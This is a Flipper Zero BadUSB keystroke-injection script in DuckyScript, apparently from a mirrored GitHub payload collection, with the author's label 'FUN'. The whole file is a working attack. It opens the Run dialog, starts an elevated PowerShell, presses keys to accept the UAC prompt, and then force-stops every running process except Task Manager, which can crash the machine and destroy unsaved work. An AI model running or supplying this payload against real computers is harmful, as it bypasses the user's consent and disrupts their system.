mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-23 15:00:13 +00:00
18 lines
404 B
Plaintext
18 lines
404 B
Plaintext
|
REM Author: UNC0V3R3D
|
||
|
REM Description: Uses the taskmanager and tries to end all processes
|
||
|
REM Version: 1.0
|
||
|
REM Category: FUN
|
||
|
DELAY 800
|
||
|
GUI r
|
||
|
DELAY 800
|
||
|
STRING powershell Start-Process powershell -Verb runAs
|
||
|
DELAY 800
|
||
|
ENTER
|
||
|
DELAY 800
|
||
|
LEFTARROW
|
||
|
DELAY 800
|
||
|
ENTER
|
||
|
DELAY 500
|
||
|
STRING Start-Process taskmgr.exe -WindowStyle Hidden; Get-Process | Where-Object { $_.Name -ne "taskmgr" } | Stop-Process -Force
|
||
|
ENTER
|